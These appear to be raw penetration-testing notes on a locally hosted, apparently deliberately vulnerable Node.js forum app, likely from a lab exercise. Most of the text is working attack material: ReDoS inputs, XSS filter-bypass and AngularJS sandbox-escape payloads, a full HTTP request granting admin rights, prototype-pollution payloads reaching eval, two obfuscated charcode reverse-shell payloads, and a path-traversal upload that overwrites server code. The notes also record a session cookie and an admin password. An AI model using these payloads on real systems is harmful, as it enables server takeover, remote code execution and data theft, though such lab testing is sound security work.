REGEX Denial Of Service:

passports.js uses regex /\d+/ at line 92 

auth.js uses regex /^[ABCDE\d]+$/ at line 33


forum.js uses RegExp



Running in console causes hang:

/(a+)+$/.test("aaaaaaaaaaaaaaaaaaaaaaaaaaaa!")

mongo DB .find method causes the attack to fail

auth.js and user.js use .match() method;

When regstering users
username : (a+)+$
pass: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1

causes crash.

Fix vulnerability by adding fuzzyText function (From https://github.com/jon-love/forumerly/blob/master/routes/forum.js line 104) in auth.js and user.js. The function escapes all RegEx special characters.



XSS:
In post body:

body</p><script>alert("123")</script>	Removes script tags
body</p><scr<script>ipt>alert("123")</scr</script>ipt>
body</p><<script>script>alert("123")<</script>/script>
body</p><<<script>script>alert("123")<</script>/script>
body</p><<<scriptscript>alert("123")<</script>/script>

Forum.js line 221-224 uses validation of html tags

body</p><<scriptscript>alert("123")</script> Small success, but does not run javascript alert.


</p><<scriptscript src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> Failed

</p><<scriptscript src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>


</p><<scriptscript src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/openerp/8.0.0/openerp.min.js?callback=alert(1)"></script>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.2/angular.min.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} };alert(1)//');}} </div>


</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app>
  <div ng-constructor="x = $root.constructor.assign($root.constructor, {prototype: {charAt: [].join}}); $eval('a=1} }; alert(1)//')"></div>
</div>





</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>



</p><<scriptscript/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
  <<scriptscript/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
  </script>
  <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>


</p><<scriptscript src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>



</p><iframe src="javasjavascript:cript:console.log(`You've been hacked!`)"></iframe>




RCE:
vulnerability in users.js merge().




Others?:
Found privilege escalation: send a crafted post /upload/users:

POST /upload/users HTTP/1.1
Host: localhost:3000
Content-Length: 404
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Origin: http://localhost:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFgVP8bepPyvfE2Ci
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3AO-ToTSvib1hWPHw3krb3ojlxqTNJ7NAa.eq47DhGdZBjNMhlesSvkHiz4MuPxN7HM1F0aUCP52cI
Connection: keep-alive

------WebKitFormBoundaryFgVP8bepPyvfE2Ci
Content-Disposition: form-data; name="upload-users"; filename="testusers"
Content-Type: application/octet-stream

[{"_id":"69ea29eb61c92d1064643d0a","username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png","admin":true}]
------WebKitFormBoundaryFgVP8bepPyvfE2Ci--



This POST adds admin privileges to the user test1.


To change a user you do not have to know the _id. It can be removed as using the wrong _id causes the login to crash. 
For something to happen using __proto__ you first have to create a user with for example:
[{"username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png"}]
Then you can use:
[{"username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png", "__proto__":{"userAutoCreateTemplate":true}}]
This makes the server explode.
The idea is trying to add userAutoCreateTemplate to "options" in passport.js. This would allow us to get to the eval function that can be used to run javascript code.



[{"username":"test1","lcUsername":"test1","password":"12","__proto__":{"toString":true}}]
Results in TypeError: Object.prototype.toString.call is not a function and DoS.



This code simulates an execution of an "attack", the trick is to use ${} to make JS run code
------------
const options = {};
options.userAutoCreateTemplate = '${console.log("success")}';
const username = "test1";
const password = 12;

const wrapperFunction = `(function() {
  const username = '${username}';
  const passport = '${password}';
  return \`${options.userAutoCreateTemplate}\`;
})()`;

console.log(wrapperFunction)

const result = eval(wrapperFunction);
-------------








If you send


POST /upload/users HTTP/1.1
Host: localhost:3000
Content-Length: 420
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Origin: http://localhost:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFgVP8bepPyvfE2Ci
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3AO-ToTSvib1hWPHw3krb3ojlxqTNJ7NAa.eq47DhGdZBjNMhlesSvkHiz4MuPxN7HM1F0aUCP52cI
Connection: keep-alive

------WebKitFormBoundaryFgVP8bepPyvfE2Ci
Content-Disposition: form-data; name="upload-users"; filename="testusers"
Content-Type: application/octet-stream

[{"username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png", "__proto__":{"userAutoCreateTemplate":"${console.log('success') || '{}'}"}}]
------WebKitFormBoundaryFgVP8bepPyvfE2Ci--



Followed by 

POST /login HTTP/1.1
Host: localhost:3000
Content-Length: 21
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:3000
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

username=a&password=a


The server does not crash. It only crashes at the first GET request. It also executes the command in userAutoCreateTemplate

METHOD Jens to get a shell:
Step 1: Do Tobias pollution method of userAutoCreateTemplate

Step 2: Send this:

POST /login HTTP/1.1
Host: localhost:3000
Content-Length: 3097
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:3000
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

username=';eval(String.fromCharCode(10,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,108,111,99,97,108,104,111,115,116,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,40,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,99,111,110,116,97,105,110,115,40,39,119,105,110,39,41,63,39,99,109,100,46,101,120,101,39,58,39,47,98,105,110,47,115,104,39,41,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,99,40,72,79,83,84,44,80,79,82,84,41,125,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))
;const y='&password=a


Since there is no limit on username length this code espaces the username variable in the wrapperFunction and runs: 
const username = '${username}';
[CODE RUNS HERE WHEN USING EVAL]
const passport = '${password}'; 

Admin login: admin/tDeX6W7u4L



Reverse shell Tobias Method:

POST /upload/users HTTP/1.1
Host: localhost:3000
Content-Length: 420
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Origin: http://localhost:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFgVP8bepPyvfE2Ci
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3AO-ToTSvib1hWPHw3krb3ojlxqTNJ7NAa.eq47DhGdZBjNMhlesSvkHiz4MuPxN7HM1F0aUCP52cI
Connection: keep-alive

------WebKitFormBoundaryFgVP8bepPyvfE2Ci
Content-Disposition: form-data; name="upload-users"; filename="testusers"
Content-Type: application/octet-stream

[{"username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png", "__proto__":{"userAutoCreateTemplate":"${eval(String.fromCharCode(10,118,97,114,32,114,101,113,117,105,114,101,32,61,32,103,108,111,98,97,108,46,114,101,113,117,105,114,101,32,124,124,32,103,108,111,98,97,108,46,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,99,111,110,115,116,114,117,99,116,111,114,46,95,108,111,97,100,59,10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,50,55,46,48,46,48,46,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,40,112,114,111,99,101,115,115,46,112,108,97,116,102,111,114,109,46,99,111,110,116,97,105,110,115,40,39,119,105,110,39,41,63,39,99,109,100,46,101,120,101,39,58,39,47,98,105,110,47,115,104,39,41,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,102,117,110,99,116,105,111,110,40,41,32,123,99,40,72,79,83,84,44,80,79,82,84,41,125,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}"}}]
------WebKitFormBoundaryFgVP8bepPyvfE2Ci--





Other attack: Path traversal

By naming myself ../../../routes/user.js, I can override the user.js file with my own by uploading it via a POST req (CHANGE COOKIE!):

POST /upload HTTP/1.1
Host: localhost:3000
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPyIAjKngi5VyKAQb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/settings
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3ADDD1nS0KaK3toQhnv60HJd7otmp3n1FT.GbIIrvzl2K%2FDMhXJzC0XrgrjLUrihNz2bZVIu9Ct1r0
Connection: keep-alive
Content-Length: 12532

------WebKitFormBoundaryPyIAjKngi5VyKAQb
Content-Disposition: form-data; name="avatar"; filename="test.png"
Content-Type: image/png

[User.js CODE]


------WebKitFormBoundaryPyIAjKngi5VyKAQb--


 I have inserted a console.log() when a user's profile is visited in userOwn.js to prove that arbitrary code is possible to run on the server, after the server restarts.